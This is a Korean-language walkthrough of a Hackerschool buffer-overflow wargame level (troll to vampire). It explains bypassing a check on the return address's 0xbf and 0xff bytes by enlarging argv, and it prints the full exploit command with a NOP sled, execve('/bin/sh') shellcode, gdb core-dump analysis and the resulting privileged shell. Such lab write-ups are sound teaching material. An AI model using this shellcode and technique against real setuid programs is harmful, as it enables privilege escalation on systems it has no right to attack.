hackerschool bof 원정대 troll -> vampire

LEVEL9 (troll -> vampire) : check 0xbfff

0xbfff를 체크한다고 하는데 문제의 소스를 보자

[troll@localhost .izayoi]$ cat vampire.c #include <stdio.h> #include <stdlib.h> main(int argc, char *argv[]) {         char buffer[40];         if(argc < 2){                 printf("argv error\n");                 exit(0);         }         if(argv[1][47] != '\xbf')         {                 printf("stack is still your friend.\n");                 exit(0);         }         // here is changed!         if(argv[1][46] == '\xff')         {                 printf("but it's not forever\n");                 exit(0);         }         strcpy(buffer, argv[1]);         printf("%s\n", buffer); }

역시 전과 동일하지만 bf영역(스택영역)을 가리키면서 ff영역은 되면 안된다.
이때 argv영역은 스택이 쌓이면 쌓일수록 높은 주소에서 낮은 주소로 가게 되는데 충분히 큰 크기(약 100000개)를 할당해준다면 argv의 시작주소도 낮아지게 될 것이다. 여기선 argv[1]에 주소값을 복사하도록 하고 argv[2]에 쉘코드를 집어넣는 방법을 택한다

[troll@localhost .izayoi]$ ./vampire `perl -e 'print "\xbf"x48'` `perl -e 'print "\x90"x20000,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80","a"x80000'` ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿ Segmentation fault (core dumped) [troll@localhost .izayoi]$ gdb -c core -q Core was generated by `./vampire ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿ '. Program terminated with signal 11, Segmentation fault. #0  0xbfbfbfbf in ?? () (gdb) x/70x $esp ... 0xbffe7568:     0x00000000      0x00000000      0x00000000      0x00000000 0xbffe7578:     0x36690000      0x2e003638      0x6d61762f      0x65726970 0xbffe7588:     0xbfbfbf00      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf 0xbffe7598:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf 0xbffe75a8:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf 0xbffe75b8:     0x909000bf      0x90909090      0x90909090      0x90909090 0xbffe75c8:     0x90909090      0x90909090      0x90909090      0x90909090 0xbffe75d8:     0x90909090      0x90909090      0x90909090      0x90909090 ...

이런 식으로 넣을 예정이다. 이제 argv[1]에는 적당한 값 (0xbffe75f8) 정도를 넣어볼 것이다.

[troll@localhost troll]$ ./vampire `perl -e 'print "\xbf"x44,"\xf8\x75\xfe\xbf"'` `perl -e 'print "\x90"x20000,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80","a"x80000'` ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿øuþ¿ bash$ id;my-pass uid=508(troll) gid=508(troll) euid=509(vampire) egid=509(vampire) groups=508(troll) euid = 509 music world

성공